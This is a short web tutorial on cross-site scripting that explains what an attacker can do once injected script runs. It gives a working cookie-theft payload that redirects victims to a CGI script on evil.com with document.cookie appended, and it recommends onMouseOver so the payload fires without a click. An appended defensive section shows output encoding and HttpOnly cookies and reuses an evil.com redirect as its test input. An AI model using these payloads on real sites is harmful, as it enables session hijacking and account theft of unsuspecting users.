I can run script, what now?
Redirection
You've seen how you can enter script into a page and have it run when a user clicks on a link or views a page.
This is really just a proof of concept; you don't want to have people viewing the popup boxes all day!
So... you want to do something more useful?
Other Tips
One common technique is to redirect the user to a different website which you control. This would allow you to record the user's cookie for later (ab)use.
The way I've done this in the past is to use code like this:
<script>
document.location = 'http://evil.com/blah.cgi?cookie=' + document.cookie;
</script>
This would redirect the user to a CGI script called 'blah.cgi' on a website 'evil.com'.
The CGI script gets given the cookie of the innocent user as a parameter called 'cookie'. This could be recorded for use later.
Using the onClick handler you have to rely upon the user clicking on a link you have placed.
You do run the risk that the user will not click it, so what then?
You can use another method, onMouseOver, which allows you to have code executed when the mouse pointer merely moves over a link.
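As an added defensive example (not part of the original article): output-encoding user-supplied text makes injected script tags and onClick/onMouseOver attributes render as inert text, and marking the session cookie HttpOnly keeps it out of document.cookie. The function names and sample values are constructed for illustration.

```javascript
// Added defensive example; function names and sample values are constructed.

// Encode text for HTML element content and quoted attribute values so that
// injected <script> tags and onClick/onMouseOver attributes become plain text.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Build a Set-Cookie header value for a session identifier.
// HttpOnly keeps the cookie out of document.cookie; Secure and SameSite
// restrict when the browser sends it.
function buildSessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Model of what page script reads from document.cookie, given the Set-Cookie
// headers the server sent: cookies flagged HttpOnly are excluded.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map((header) => header.split(';').map((part) => part.trim()))
    .filter((parts) => !parts.slice(1).some((attr) => attr.toLowerCase() === 'httponly'))
    .map((parts) => parts[0])
    .join('; ');
}

// Constructed inputs: a user-supplied comment and two response cookies.
const comment = '<a href="#" onMouseOver="document.location=\'http://evil.com/\'">hi</a>';
const headers = [
  'theme=dark; Path=/',
  buildSessionCookie('session', 'abc123'),
];

console.log(escapeHtml(comment));          // markup shown as text, not parsed
console.log(scriptVisibleCookies(headers)); // session cookie is not listed
```

The encoder covers element content and quoted attribute values only; data placed inside script blocks or URLs needs encoding for that context.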
Other articles:
http://ha.ckers.org/xss.html
http://www.informit.com/articles/article.asp?p=603037&rl=1